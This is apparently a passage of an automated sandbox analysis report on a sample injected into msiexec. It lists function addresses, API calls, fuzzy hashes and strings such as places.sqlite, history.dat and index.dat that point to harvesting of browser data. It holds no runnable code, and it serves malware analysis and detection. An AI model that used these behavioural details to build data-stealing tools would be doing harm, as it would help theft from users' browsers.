                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memcmp
                                                                                                    • String ID: $$8
                                                                                                    • API String ID: 2808797137-435121686
                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1979745280-0
                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 2641622041-467022611
                                                                                                    • Opcode ID: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                    • Opcode Fuzzy Hash: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 839530781-0
                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: *.*$index.dat
                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397143404-0
                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1125800050-0
                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                    Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleSleep
                                                                                                    • String ID: }A
                                                                                                    • API String ID: 252777609-2138825249
                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 2221118986-907554435
                                                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                    Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: .#v
                                                                                                    • API String ID: 2081463915-507759092
                                                                                                    • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                    • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2445788494-0
                                                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                    Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                    Download Yara Rule
